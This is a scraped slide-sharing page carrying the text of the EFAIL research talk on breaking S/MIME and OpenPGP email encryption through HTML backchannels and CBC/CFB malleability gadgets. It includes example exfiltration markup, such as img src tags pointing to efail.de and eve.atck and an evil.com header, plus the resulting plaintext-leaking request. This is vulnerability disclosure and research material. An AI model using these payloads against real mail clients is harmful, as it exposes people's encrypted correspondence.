Priyanka Aash, profile picture
Uploaded byPriyanka Aash
PDF, PPTX620 views

Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels

The document discusses the efail attack, which exploits vulnerabilities in S/MIME and OpenPGP email encryption standards, allowing attackers to exfiltrate sensitive information. It highlights various techniques used to breach email encryption and emphasizes the need for improvements in cryptographic standards and implementations. The authors propose recommendations for short-term and long-term countermeasures to enhance email security.

Embed presentation

Download as PDF, PPTX
EFAIL: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2 1 Münster University of Applied Sciences 2 Ruhr University Bochum 3 KU Leuven
• Very important attack • Because it has a logo • Novel attack techniques targeting MIME, S/MIME and OpenPGP EFAIL 2 CVE-2018-4111 CVE-2018-4221 CVE-2018-4227 CVE-2018-5162 CVE-2018-5184 CVE-2018-5185 CVE-2018-8160 CVE-2018-8305 CVE-2018-12372 CVE-2018-12373
Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
History of secure email 4
OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi-root trust-hierarchies Two competing standards 5
Nation state attackers • Massive collection of Emails • Snowden’s global surveillance disclosure Breach of email provider • Single point of failure • Aren’t they reading/analyzing my emails anyway? Insecure Transport • TLS might be used – we don’t know! Compromise of email account • Phishing • Bad passwords Motivation for using end-to-end encryption 6
History of secure email 7
Both standards use old crypto Ciphertext C = Enc(M) C1 valid/invalid M = Dec(C) C2 valid/invalid … (repeated several times) Vulnerable to padding oracle attacks 8
CBC / CFB modes of operation used, but their usage is not exploitable Old crypto has no negative impact Assumption: No backchannel is given 9
Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
Forcing a mail client to phone home • HTML/CSS • JavaScript • Email header • Attachment preview • Certificate verification Backchannel techniques 11 <img src="http://efail.de"> <object data="ftp://efail.de"> <style>@import '//efail.de'</style> ...
Forcing a mail client to phone home • HTML/CSS • JavaScript • Email header • Attachment preview • Certificate verification Backchannel techniques 12 XSS cheat sheets
Forcing a mail client to phone home • HTML/CSS • JavaScript • Email header • Attachment preview • Certificate verification Backchannel techniques 13 Disposition-Notification-To: eve@evil.com Remote-Attachment-URL: http://efail.de X-Image-URL: http://efail.de …
Forcing a mail client to phone home • HTML/CSS • JavaScript • Email header • Attachment preview • Certificate verification Backchannel techniques 14 PDF, SVG, VCards, etc.
Forcing a mail client to phone home • HTML/CSS • JavaScript • Email header • Attachment preview • Certificate verification Backchannel techniques 15 OCSP, CRL, intermediate certs
Windows Linux macOS iOS Android Webmail Webapp Outlook IBM Notes Postbox Foxmail Live Mail Pegasus The Bat! Mulberry eM Client Thunderbird Evolution KMail Trojitá Claws Mutt Apple Mail Airmail MailMate Mail App CanaryMail Outlook K-9 Mail R2Mail MailDroid Nine GMail Outlook.com Yahoo! iCloud GMX HushMail Mail.ru FastMail Roundcube RainLoop AfterLogic Horde IMP ProtonMail Mailfence Mailbox ZoHo Mail leak by defaultask user leak via bypass script execution Backchannels found W8Mail W10MailWLMail Mailpile Exchange GroupWise Evaluation of backchannels in email clients 16
Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
Attacker model 18
Attacker model 19
Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
Content-type: app/encrypted 𝑠 • Choose message 𝑚 • Generate session key 𝑠 • Encrypt message 𝑚 with session key 𝑠 • 𝑐 = 𝐴𝐸𝑆𝑠(𝑚) • Encrypt session key 𝑠 with public key 𝑝𝑢𝑏 of recipient • 𝑘 = 𝑅𝑆𝐴 𝑝𝑢𝑏(𝑠) • Send the encrypted session key and the encrypted message to the recipient 21 𝒌 Dear Alice, thank you for your email. The meeting tomorrow will be at 9 o‘clock. c Hybrid encryption
Content-type: app/encrypted 𝑠𝒌 • Obtain the encrypted email • Extract ciphertext 𝑘 and ciphertext 𝑐 • Decrypt 𝑘 with private key 𝑠𝑒𝑐 to obtain session key 𝑠 • 𝑠 = 𝑅𝑆𝐴 𝑠𝑒𝑐(𝑘) • Decrypt ciphertext 𝑐 with session key 𝑠 to obtain the cleartext 𝑚 • 𝑚 = 𝐴𝐸𝑆𝑠 𝑐 Dear Alice, thank you for your email. The meeting tomorrow will be at 9 o‘clock. c 22 Hybrid encryption
𝒄↯ 𝑠 23 Malleability of CBC/CFB
𝒄↯ 𝑠 Dear Alice, ????????????????ur efail. The meeting tomorrow will be at 9 o‘clock. 24 Malleability of CBC/CFB
Message Authentication Codes (MAC) • Protection against ciphertext tampering • Attacks against MAC-then-Encrypt (Vaudenay) • Attacks against MAC-and-Encrypt (Paterson) 25 Hybrid malleability of CBC/CFG
26 S/MIME Structure S/MIME: Absence of authenticated encryption
27 decryption Content-type: te C1 P0 decryption xt/htmlnDear Bob C2 P1 C0 Malleability of CBC/CFB
28 decryption Zontent-type: te C1 P0' decryption xt/htmlnDear Bob C2 P1 C0' Malleability of CBC/CFB A B Q 0 0 0 0 1 1 1 0 1 1 1 0 XOR A B Q 0 0 0 0 1 1 1 0 1 1 1 0
09.08.2018 29 C0 ⊕ P0 decryption 0000000000000000 C1 P0' decryption xt/htmlnDear Bob C2 P1 CBC Gadget Malleability of CBC/CFB
30 C0 ⊕ P0 ⊕ Pc decryption <img src=”ev.il/ C1 P0' decryption xt/htmlnDear Bob C2 P1 A B Q 0 0 0 0 1 1 1 0 1 1 1 0 Malleability of CBC/CFB XOR
31 decryption Content-type: te C1' P0' decryption Zt/htmlnDear Bob C2 P1' C0 Malleability of CBC/CFB
32 decryption ???????????????? C1' P0' decryption Zt/htmlnDear Bob C2 P1' C0 Malleability of CBC/CFB
Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
Practical Attack against S/MIME 34
35 ???????????????? <base " ???????????????? <img " ???????????????? " href="http:"> Content-type: te xt/htmlnDear Sir or Madam, the se ecret meeting wi ???????????????? " src="efail.de/ Content-type: te xt/htmlnDear Sir or Madam, the se ecret meeting wi ???????????????? "> Original Crafted Changing Duplicating Reordering Practical Attack against S/MIME
Practical Attack against S/MIME
Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
OpenPGP • OpenPGP uses a variation of CFB-Mode • PGP-Standard has integrity protection • Compression is enabled by default Ci Pi (known) Ci+1 Pi-1 encryption encryption XCi encryption Pc (chosen) random plaintext ? ? ? ? ? ? ? ? encryption 38
OpenPGP – Integrity Protection • Integrity Protection is performed by adding an MDC at the end of the packet TAG 18 LENGTH TAG 8 LENGTH TAG 11 LENGTH Content-Type:multipart/mixed; boundary=“ … … TAG 19 LENGTH efa3e9ca54f0879c5b187636c23b7de376a5ba41 <compressed> <encrypted> Tag Type of PGP packet 8 CD: Compressed Data Packet 9 SE: Symmetrically Encrypted Packet 11 LD: Literal Data Packet 18 SEIP: Symmetrically Encrypted and Integrity Protected Packet 19 MDC: Modification Detection Code Packet 39
RFC4880 on Modification Detection Codes
OpenPGP – Integrity Protection Defeating Integrity Protection Vulnerable Not Vulnerable Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE Outlook 2007 GPG4WIN 3.0.0 Outlook 2010 GPG4WIN Outlook 2013 GPG4WIN Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01 41
OpenPGP – Compression • PGP uses compression (DEFLATE) • Makes our life much harder: we do not know so many plaintext bytes • We need to know at least 11 Bytes of the plaintext but only know 4 from the packet headers • But: We can do multiple guesses per Mail • Mostly between 500 to 1,000 „submails“ per mail Content-Type: multipart/mixed; boundary=„BOUNDARY" --BOUNDARY <GUESS_1> --BOUNDARY ... --BOUNDARY <GUESS_N> --BOUNDARY-- 42
OpenPGP – Compression 43
OpenPGP – Compression Content-Type: multipart/alternative; boundary="b1_232f841e30b3b8112f31ed86c8cee5ab" --b1_232f841e30b3b8112f31ed86c8cee5ab Content-Type: text/html; charset="UTF-8" <html> <body> <p>Hello XXX,</p> <p>here is your code: 123456</p> <img src="https://www.facebook.com/email_open_log_pic.php?mid=TRACKING_CODE_HERE"/> </body> </html> --b1_232f841e30b3b8112f31ed86c8cee5ab-- 44
OpenPGP – Compression Facebook Password Recovery • Generated 100,000 Password Recovery Emails based on template • Encrypted them with GnuPG in default configuration • Estimated number of guesses based on variance in starting bytes No. Starts with … % Cumulated % 1 a302789ced590b9014c519 30.95 30.95 2 a302789ced590d9014c515 7.99 38.94 3 a302789ced59099014d519 7.80 46.73 … 211 a302789ced59098c14551a 0.001 100 Content-Type: multipart/mixed; boundary=„BOUNDARY" --BOUNDARY A302789ced590b90... --BOUNDARY A302789ced590d90... --BOUNDARY A302789ced590990... --BOUNDARY-- 45
OpenPGP – Compression Enron Email Dataset • Contains approx. 500,000 „real“ Emails1 • Encrypted them with GnuPG in default configuration • Estimated number of guesses based on variance in starting bytes No. Starts with … % Cumulated % 1 a302789c8d8f4b4ec3400c 6.61 6.61 2 a302789ced90c16e133110 2.21 8.82 3 a302789c7590b14ec33010 0.66 9.48 … 500 a302789c4d90cb8ed34010 0.03 40.99 46 1 https://www.cs.cmu.edu/~enron/
47
Impact on the standards S/MIME standard draft - draft-ietf-lamps-rfc5751-bis-11 • References EFAIL paper • Recommends the usage of authenticated encryption with AES-GCM OpenPGP standard draft - draft-ietf-openpgp-rfc4880bis-05 • Deprecates Symmetrically Encrypted (SE) data packets • Proposes AEAD protected data packets • Implementations should not allow users to access erroneous data 48
Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
• This attack is possible since 2003 in Thunderbird • Independent of the applied encryption scheme • Somewhat fixable in implementation • But works directly in … • Apple Mail / Mail App • Thunderbird • Postbox • … • The standards do not give any definition for that! Direct exfiltration 50
Encrypting Alice writes a Mail to Bob From: Alice To: Bob Dear Bob, the meeting tomorrow will be at 9 o‘clock. -----BEGIN PGP MESSAGE----- hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg… -----END PGP MESSAGE----- Alice’s mail program encrypts the email Direct exfiltration 51
Encrypting Alice writes a Mail to Bob From: Alice To: Bob Dear Bob, the meeting tomorrow will be at 9 o‘clock. -----BEGIN PGP MESSAGE----- hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg… -----END PGP MESSAGE----- Alice’s mail program encrypts the email Direct exfiltration 52
Original E-Mail Eve’s attack E-Mail Content-Type: text/html <img src="http://eve.atck/ Content-Type: text/html "> From: Eve To: Bob From: Alice To: Bob Eve modifies the email and sends it to Bob or Alice Eve captures the encrypted mail between Alice and Bob -----BEGIN PGP MESSAGE----- hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg… -----END PGP MESSAGE----- Direct exfiltration 53
Bob’s mail program decrypts the email Decrypting Eve’s attack E-Mail Content-Type: text/html <img src="http://eve.atck/ Content-Type: text/html "> From: Eve To: Bob Bob’s mail program puts the clear text back into the body -----BEGIN PGP MESSAGE----- hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg… -----END PGP MESSAGE----- Dear Bob, the meeting tomorrow will be at 9 o‘clock. Direct exfiltration 54
Eve’s attack E-Mail Content-Type: text/html <img src="http://eve.atck/ Content-Type: text/html "> Content-Type: text/html <img src="http://eve.atck/Dear Bob, the meeting tomorrow will be at 9 o‘clock.“> From: Eve To: Bob GET /Dear%20Bob%2C%0D%0Athe %20meeting%20tomorrow%20will %20be%20at%209%20o%E2%80%98c lock. Eve Direct exfiltration 55
Direct exfiltration – Demo Time
• New attacks exploiting functionalities between crypto / non-crypto standards • Countermeasures hard to apply: • S/MIME is broken • OpenPGP needs revisions • Recommendations: • Short term: disable HTML • Mid term: patch the clients • Long term: new standards Conclusions 57
• Crypto standards need to evolve • We knew that CBC is dangerous since how long? • Crypto is useless without Authenticated Encryption • HTML email is bad • Writing privacy preserving email clients is hard • Securely embedding PGP and S/MIME is hard • But: EFAIL does not rely on HTML • Engineering lesson • Cryptosystems contain multiple components • All of them may look `sane’ for themselves • When combined, things can easily break Black Hat sound bytes 58 Thank you! Questions? www.efail.de

More Related Content

PDF
HTTP/2 What's inside and Why
byAdrian Cole
 
PDF
HTTP2:新的机遇与挑战
byJerry Qu
 
PDF
Teach your (micro)services talk Protocol Buffers with gRPC.
byMihai Iachimovschi
 
PPTX
Grpc present
byPhạm Hải Anh
 
PDF
HotPics 2021
byneexemil
 
PDF
HTTP2 & HPACK #pyfes 2013-11-30
byJxck Jxck
 
PDF
So that was HTTP/2, what's next?
byDaniel Stenberg
 
PDF
Make gRPC great again
byRoberto Veral del Pozo
 
HTTP/2 What's inside and Why
byAdrian Cole
 
HTTP2:新的机遇与挑战
byJerry Qu
 
Teach your (micro)services talk Protocol Buffers with gRPC.
byMihai Iachimovschi
 
Grpc present
byPhạm Hải Anh
 
HotPics 2021
byneexemil
 
HTTP2 & HPACK #pyfes 2013-11-30
byJxck Jxck
 
So that was HTTP/2, what's next?
byDaniel Stenberg
 
Make gRPC great again
byRoberto Veral del Pozo
 

What's hot

KEY
I got 99 problems, but ReST ain't one
byAdrian Cole
 
PDF
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
byBusiness Link Krakow
 
PPTX
HTTP2 and gRPC
byGuo Jing
 
PDF
Side-Channels on the Web: Attacks and Defenses
byTom Van Goethem
 
PDF
Enabling Googley microservices with HTTP/2 and gRPC.
byAlex Borysov
 
PDF
Just curl it!
byDaniel Stenberg
 
PPT
Juglouvain http revisited
bymarctritschler
 
PDF
DNS over HTTPS
byDaniel Stenberg
 
PDF
HEIST: HTTP encrypted information can be stolen through TCP windows
byPriyanka Aash
 
PPTX
Http2 Security Perspective
bySunil Kumar
 
PDF
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
byNoNameCon
 
PDF
RPC protocols
by오석 한
 
PDF
Promise of Push (HTTP/2 Web Performance)
byColin Bendell
 
PDF
Serialization in Go
byAlbert Strasheim
 
PDF
Generating Unified APIs with Protocol Buffers and gRPC
byC4Media
 
PPTX
gRPC on .NET Core - NDC Sydney 2019
byJames Newton-King
 
PDF
Http3 fullstackfest-2019
byDaniel Stenberg
 
PDF
Developing the fastest HTTP/2 server
byKazuho Oku
 
PDF
gRPC or Rest, why not both?
byMohammad Murad
 
PDF
Stuart Larsen, attacking http2implementations-rev1
byPacSecJP
 
I got 99 problems, but ReST ain't one
byAdrian Cole
 
Bartosz Zaczyński (Grand Parade Poland) - WebSocket for Dummies
byBusiness Link Krakow
 
HTTP2 and gRPC
byGuo Jing
 
Side-Channels on the Web: Attacks and Defenses
byTom Van Goethem
 
Enabling Googley microservices with HTTP/2 and gRPC.
byAlex Borysov
 
Just curl it!
byDaniel Stenberg
 
Juglouvain http revisited
bymarctritschler
 
DNS over HTTPS
byDaniel Stenberg
 
HEIST: HTTP encrypted information can be stolen through TCP windows
byPriyanka Aash
 
Http2 Security Perspective
bySunil Kumar
 
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
byNoNameCon
 
RPC protocols
by오석 한
 
Promise of Push (HTTP/2 Web Performance)
byColin Bendell
 
Serialization in Go
byAlbert Strasheim
 
Generating Unified APIs with Protocol Buffers and gRPC
byC4Media
 
gRPC on .NET Core - NDC Sydney 2019
byJames Newton-King
 
Http3 fullstackfest-2019
byDaniel Stenberg
 
Developing the fastest HTTP/2 server
byKazuho Oku
 
gRPC or Rest, why not both?
byMohammad Murad
 
Stuart Larsen, attacking http2implementations-rev1
byPacSecJP
 

Similar to Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels

PPT
Malware and Software Vulnerability Analysis
byEmLowQuis
 
PPT
jhvkjk lbkbl jblkj bkjbkjb kjbk blk kjblkjb
byVivekyadav620344
 
PPT
CAP6135 - Malware and Software Vulnerability Analysis
byAntonioWendelldeOliv
 
PDF
M.FLORENCE DAYANA/electronic mail security.pdf
byDr.Florence Dayana
 
PPT
Malware and Software Vulnerability Analysis Spam and Phishing .ppt
byNehaNeha652711
 
PDF
BAIT1103 Chapter 5
bylimsh
 
PDF
Electronic mail security
byDr.Florence Dayana
 
PPTX
Email security
byMohammed Hilal
 
PDF
DEF CON 27 -JENS MUELLE - re what's up Johnny covert content attacks on email...
byFelipe Prado
 
PPT
Chapter 5Electronic MailElectronic Mail.ppt
bynakshpub
 
PPT
types of attacks on electronic mail security
byFlavia Gonsalves
 
PPTX
E-mail Security S/MIME PrettyGoodPrivacy
byDr.Manjunath Kotari
 
PPTX
module 4_7th sem_ Electronic Mail Security.pptx
byprateekPallav2
 
PPT
ch05.ppt
byKaivanParikh
 
PPT
Chapter 5
byshivz3
 
PDF
CNS - Unit v
byArthyR3
 
PPT
PGP S/MIME
bySou Jana
 
PPT
PGP (1). in information security and data
bygallanandhini
 
PPTX
CRYPT.pptx
byVMahesh5
 
PPT
unit6.ppt
bySrinivas Devulapalli
 
Malware and Software Vulnerability Analysis
byEmLowQuis
 
jhvkjk lbkbl jblkj bkjbkjb kjbk blk kjblkjb
byVivekyadav620344
 
CAP6135 - Malware and Software Vulnerability Analysis
byAntonioWendelldeOliv
 
M.FLORENCE DAYANA/electronic mail security.pdf
byDr.Florence Dayana
 
Malware and Software Vulnerability Analysis Spam and Phishing .ppt
byNehaNeha652711
 
BAIT1103 Chapter 5
bylimsh
 
Electronic mail security
byDr.Florence Dayana
 
Email security
byMohammed Hilal
 
DEF CON 27 -JENS MUELLE - re what's up Johnny covert content attacks on email...
byFelipe Prado
 
Chapter 5Electronic MailElectronic Mail.ppt
bynakshpub
 
types of attacks on electronic mail security
byFlavia Gonsalves
 
E-mail Security S/MIME PrettyGoodPrivacy
byDr.Manjunath Kotari
 
module 4_7th sem_ Electronic Mail Security.pptx
byprateekPallav2
 
ch05.ppt
byKaivanParikh
 
Chapter 5
byshivz3
 
CNS - Unit v
byArthyR3
 
PGP S/MIME
bySou Jana
 
PGP (1). in information security and data
bygallanandhini
 
CRYPT.pptx
byVMahesh5
 
unit6.ppt
bySrinivas Devulapalli
 

More from Priyanka Aash

PPTX
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
byPriyanka Aash
 
PDF
From Chatbot to Destroyer of Endpoints - Can ChatGPT Automate EDR Bypasses (1...
byPriyanka Aash
 
PDF
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
byPriyanka Aash
 
PDF
Oh, the Possibilities - Balancing Innovation and Risk with Generative AI.pdf
byPriyanka Aash
 
PDF
Lessons Learned from Developing Secure AI Workflows.pdf
byPriyanka Aash
 
PDF
Cyber Defense Matrix Workshop - RSA Conference
byPriyanka Aash
 
PDF
A Constitutional Quagmire - Ethical Minefields of AI, Cyber, and Privacy.pdf
byPriyanka Aash
 
PDF
Securing AI - There Is No Try, Only Do!.pdf
byPriyanka Aash
 
PDF
GenAI Opportunities and Challenges - Where 370 Enterprises Are Focusing Now.pdf
byPriyanka Aash
 
PDF
Coordinated Disclosure for ML - What's Different and What's the Same.pdf
byPriyanka Aash
 
PDF
10 Key Challenges for AI within the EU Data Protection Framework.pdf
byPriyanka Aash
 
PDF
Techniques for Automatic Device Identification and Network Assignment.pdf
byPriyanka Aash
 
PDF
Keynote : Presentation on SASE Technology
byPriyanka Aash
 
PDF
Keynote : AI & Future Of Offensive Security
byPriyanka Aash
 
PDF
Redefining Cybersecurity with AI Capabilities
byPriyanka Aash
 
PDF
Demystifying Neural Networks And Building Cybersecurity Applications
byPriyanka Aash
 
PDF
Finetuning GenAI For Hacking and Defending
byPriyanka Aash
 
PDF
(CISOPlatform Summit & SACON 2024) Kids Cyber Security .pdf
byPriyanka Aash
 
PDF
(CISOPlatform Summit & SACON 2024) Regulation & Response In Banks.pdf
byPriyanka Aash
 
PDF
(CISOPlatform Summit & SACON 2024) Cyber Insurance & Risk Quantification.pdf
byPriyanka Aash
 
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
byPriyanka Aash
 
From Chatbot to Destroyer of Endpoints - Can ChatGPT Automate EDR Bypasses (1...
byPriyanka Aash
 
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
byPriyanka Aash
 
Oh, the Possibilities - Balancing Innovation and Risk with Generative AI.pdf
byPriyanka Aash
 
Lessons Learned from Developing Secure AI Workflows.pdf
byPriyanka Aash
 
Cyber Defense Matrix Workshop - RSA Conference
byPriyanka Aash
 
A Constitutional Quagmire - Ethical Minefields of AI, Cyber, and Privacy.pdf
byPriyanka Aash
 
Securing AI - There Is No Try, Only Do!.pdf
byPriyanka Aash
 
GenAI Opportunities and Challenges - Where 370 Enterprises Are Focusing Now.pdf
byPriyanka Aash
 
Coordinated Disclosure for ML - What's Different and What's the Same.pdf
byPriyanka Aash
 
10 Key Challenges for AI within the EU Data Protection Framework.pdf
byPriyanka Aash
 
Techniques for Automatic Device Identification and Network Assignment.pdf
byPriyanka Aash
 
Keynote : Presentation on SASE Technology
byPriyanka Aash
 
Keynote : AI & Future Of Offensive Security
byPriyanka Aash
 
Redefining Cybersecurity with AI Capabilities
byPriyanka Aash
 
Demystifying Neural Networks And Building Cybersecurity Applications
byPriyanka Aash
 
Finetuning GenAI For Hacking and Defending
byPriyanka Aash
 
(CISOPlatform Summit & SACON 2024) Kids Cyber Security .pdf
byPriyanka Aash
 
(CISOPlatform Summit & SACON 2024) Regulation & Response In Banks.pdf
byPriyanka Aash
 
(CISOPlatform Summit & SACON 2024) Cyber Insurance & Risk Quantification.pdf
byPriyanka Aash
 

Recently uploaded

PDF
JCB_3CX_SPECS (24 págs) companywrench.com .pdf
byAquilesOyarzn1
 
PDF
Transcript: What Thema can do: Leveraging metadata to support the discoverabi...
byBookNet Canada
 
PDF
When Drones Decide for Themselves_ Inside the Rise of Machine-Led Flight.pdf
byLyra Anderson
 
PPTX
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
PDF
Transcript: EU regulations for the North American book supply chain - Tech Fo...
byBookNet Canada
 
PDF
Chapter 3 Cryptography and encryption techniques.pdf
byGetnet Tigabie Askale -(GM)
 
PPTX
Code Like Bro -A guide for better Coding
byMadan Panthi
 
PDF
How to Design Premium Health (Public Health) PPT Using AI? Top Strategies
byPublic Health Concern Nepal
 
PDF
Build Next-Gen Spatial & Sensor Workflows: Secure, Scalable Processing in Sno...
bySafe Software
 
PDF
Dev Dives: Build and deploy agentic automations - the unified way
byUiPathCommunity
 
PDF
"When every team does things "right", but together it turns into chaos", Yozh...
byFwdays
 
PPTX
Software Engineering in the Age of AI Agents
byHusseinMalikMammadli
 
PDF
Peculiar Findings Around CEX Activity and ETH Price
bytobbymnbvcxz
 
PDF
Agentic-Document-Extraction-2026-Presentation.pdf
byTamanna
 
PDF
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
PDF
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
PDF
AI-Powered Alert Analysis with ClickHouse - DB Mastery Jan'26
byAlkin Tezuysal
 
PDF
The Enterprise Web3 Landscape - a view from Kaleido based on the past 10 year...
byPeter Broadhurst
 
PDF
2026_01_28 - OpenMetadata Community Meeting.pdf
byOpenMetadata
 
PDF
TrustArc Webinar - From Zero to Privacy Hero: Launching Your Program Right an...
byTrustArc
 
JCB_3CX_SPECS (24 págs) companywrench.com .pdf
byAquilesOyarzn1
 
Transcript: What Thema can do: Leveraging metadata to support the discoverabi...
byBookNet Canada
 
When Drones Decide for Themselves_ Inside the Rise of Machine-Led Flight.pdf
byLyra Anderson
 
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
Transcript: EU regulations for the North American book supply chain - Tech Fo...
byBookNet Canada
 
Chapter 3 Cryptography and encryption techniques.pdf
byGetnet Tigabie Askale -(GM)
 
Code Like Bro -A guide for better Coding
byMadan Panthi
 
How to Design Premium Health (Public Health) PPT Using AI? Top Strategies
byPublic Health Concern Nepal
 
Build Next-Gen Spatial & Sensor Workflows: Secure, Scalable Processing in Sno...
bySafe Software
 
Dev Dives: Build and deploy agentic automations - the unified way
byUiPathCommunity
 
"When every team does things "right", but together it turns into chaos", Yozh...
byFwdays
 
Software Engineering in the Age of AI Agents
byHusseinMalikMammadli
 
Peculiar Findings Around CEX Activity and ETH Price
bytobbymnbvcxz
 
Agentic-Document-Extraction-2026-Presentation.pdf
byTamanna
 
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
AI-Powered Alert Analysis with ClickHouse - DB Mastery Jan'26
byAlkin Tezuysal
 
The Enterprise Web3 Landscape - a view from Kaleido based on the past 10 year...
byPeter Broadhurst
 
2026_01_28 - OpenMetadata Community Meeting.pdf
byOpenMetadata
 
TrustArc Webinar - From Zero to Privacy Hero: Launching Your Program Right an...
byTrustArc
 

Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels

  • 1.
    EFAIL: Breaking S/MIMEand OpenPGP Email Encryption using Exfiltration Channels Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2 1 Münster University of Applied Sciences 2 Ruhr University Bochum 3 KU Leuven
  • 2.
    • Very importantattack • Because it has a logo • Novel attack techniques targeting MIME, S/MIME and OpenPGP EFAIL 2 CVE-2018-4111 CVE-2018-4221 CVE-2018-4227 CVE-2018-5162 CVE-2018-5184 CVE-2018-5185 CVE-2018-8160 CVE-2018-8305 CVE-2018-12372 CVE-2018-12373
  • 3.
    Overview 1. Introduction 2. Backchannels 3.Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
  • 4.
  • 5.
    OpenPGP (RFC 4880) •Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi-root trust-hierarchies Two competing standards 5
  • 6.
    Nation state attackers •Massive collection of Emails • Snowden’s global surveillance disclosure Breach of email provider • Single point of failure • Aren’t they reading/analyzing my emails anyway? Insecure Transport • TLS might be used – we don’t know! Compromise of email account • Phishing • Bad passwords Motivation for using end-to-end encryption 6
  • 7.
  • 8.
    Both standards useold crypto Ciphertext C = Enc(M) C1 valid/invalid M = Dec(C) C2 valid/invalid … (repeated several times) Vulnerable to padding oracle attacks 8
  • 9.
    CBC / CFBmodes of operation used, but their usage is not exploitable Old crypto has no negative impact Assumption: No backchannel is given 9
  • 10.
    Overview 1. Introduction 2. Backchannels 3.Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
  • 11.
    Forcing a mailclient to phone home • HTML/CSS • JavaScript • Email header • Attachment preview • Certificate verification Backchannel techniques 11 <img src="http://efail.de"> <object data="ftp://efail.de"> <style>@import '//efail.de'</style> ...
  • 12.
    Forcing a mailclient to phone home • HTML/CSS • JavaScript • Email header • Attachment preview • Certificate verification Backchannel techniques 12 XSS cheat sheets
  • 13.
    Forcing a mailclient to phone home • HTML/CSS • JavaScript • Email header • Attachment preview • Certificate verification Backchannel techniques 13 Disposition-Notification-To: eve@evil.com Remote-Attachment-URL: http://efail.de X-Image-URL: http://efail.de …
  • 14.
    Forcing a mailclient to phone home • HTML/CSS • JavaScript • Email header • Attachment preview • Certificate verification Backchannel techniques 14 PDF, SVG, VCards, etc.
  • 15.
    Forcing a mailclient to phone home • HTML/CSS • JavaScript • Email header • Attachment preview • Certificate verification Backchannel techniques 15 OCSP, CRL, intermediate certs
  • 16.
    Windows Linux macOS iOS Android Webmail Webapp Outlook IBM Notes Postbox Foxmail Live Mail Pegasus TheBat! Mulberry eM Client Thunderbird Evolution KMail Trojitá Claws Mutt Apple Mail Airmail MailMate Mail App CanaryMail Outlook K-9 Mail R2Mail MailDroid Nine GMail Outlook.com Yahoo! iCloud GMX HushMail Mail.ru FastMail Roundcube RainLoop AfterLogic Horde IMP ProtonMail Mailfence Mailbox ZoHo Mail leak by defaultask user leak via bypass script execution Backchannels found W8Mail W10MailWLMail Mailpile Exchange GroupWise Evaluation of backchannels in email clients 16
  • 17.
    Overview 1. Introduction 2. Backchannels 3.Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
  • 18.
  • 19.
  • 20.
    Overview 1. Introduction 2. Backchannels 3.Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
  • 21.
    Content-type: app/encrypted 𝑠 • Choosemessage 𝑚 • Generate session key 𝑠 • Encrypt message 𝑚 with session key 𝑠 • 𝑐 = 𝐴𝐸𝑆𝑠(𝑚) • Encrypt session key 𝑠 with public key 𝑝𝑢𝑏 of recipient • 𝑘 = 𝑅𝑆𝐴 𝑝𝑢𝑏(𝑠) • Send the encrypted session key and the encrypted message to the recipient 21 𝒌 Dear Alice, thank you for your email. The meeting tomorrow will be at 9 o‘clock. c Hybrid encryption
  • 22.
